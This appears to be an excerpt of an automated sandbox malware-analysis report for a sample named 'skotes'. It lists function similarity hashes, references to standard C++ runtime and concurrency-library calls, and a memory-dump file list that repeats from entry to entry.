                                                                                                                                                                                                                                                  • API String ID: 1635606685-0
                                                                                                                                                                                                                                                  • Opcode ID: 88be86e46e58b2ed34c82d3a3cef69ad98040e90660acb8e6bebbea4315e2fb2
                                                                                                                                                                                                                                                  • Instruction ID: 097fa522b91a2437e6814462d762cfdfb3a0a27477515a824ca207843d94a317
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88be86e46e58b2ed34c82d3a3cef69ad98040e90660acb8e6bebbea4315e2fb2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C281D172D012459BDF20AE658881EEF7BA5EF0A354F1A415BE904B7281D73DCC05CBB9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                  • Opcode ID: edbdd12a5b63c13203c73137bc506954b449b3da983e29fa60690484e129e7ec
                                                                                                                                                                                                                                                  • Instruction ID: c8eb525f4b6d935f1764149f6ef0eb758416525b505f89ee1412b4a14ad22675
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edbdd12a5b63c13203c73137bc506954b449b3da983e29fa60690484e129e7ec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10512572A05A02AFDB249F15DA41B7B73B5EF32304F14452FE80187691E739ED41CB98
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1707706676-0
                                                                                                                                                                                                                                                  • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                                  • Instruction ID: 79c4a838d18e62d08823a36cf380129554bffc3611619a36cb03c44c9ada03b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E51AA75A042099FDF10CFA8C4806EEBBF4EFE6364F14449AE850A7351D3BAAA05CB54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049DB64
                                                                                                                                                                                                                                                    • Part of subcall function 00498F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00498F50
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0049DBC3
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0049DBE9
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 0049DC56
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1091748018-0
                                                                                                                                                                                                                                                  • Opcode ID: 8abcc60e7c2b5acacd10bccb9d675915e6b6017cdc55e11b3c993568605438c3
                                                                                                                                                                                                                                                  • Instruction ID: 225838d27c0b58331e0a5e061771d87d1505f196450d104e60500bd681ef5776
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8abcc60e7c2b5acacd10bccb9d675915e6b6017cdc55e11b3c993568605438c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF41F474A04210ABDF19EB25C886BBEBF75AF45314F0440AFE5069B3C2CB78AD45C799
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _InternalDeleteHelper.LIBCONCRT ref: 004956F2
                                                                                                                                                                                                                                                  • _InternalDeleteHelper.LIBCONCRT ref: 00495726
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0049578B
                                                                                                                                                                                                                                                  • SafeRWList.LIBCONCRT ref: 0049579A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
